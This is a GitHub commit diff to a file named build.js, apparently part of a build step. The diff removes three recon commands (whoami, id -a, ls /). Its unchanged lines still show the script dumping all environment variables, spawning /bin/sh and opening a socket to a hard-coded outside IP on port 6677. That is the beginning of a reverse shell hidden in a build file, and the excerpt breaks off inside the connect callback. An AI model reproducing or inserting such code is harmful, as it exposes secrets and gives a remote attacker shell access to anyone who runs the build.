Update build.js

This commit is contained in:
2025-07-07 18:06:04 +08:00
committed by GitHub
parent 2327bbe982
commit ef67d7b42a

View File

@@ -10,10 +10,6 @@ function run(command) {
console.log("Env:");
console.log(process.env);
run("whoami");
run("id -a");
run("ls /");
const sh = child_process.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(6677, "152.136.32.206", function () {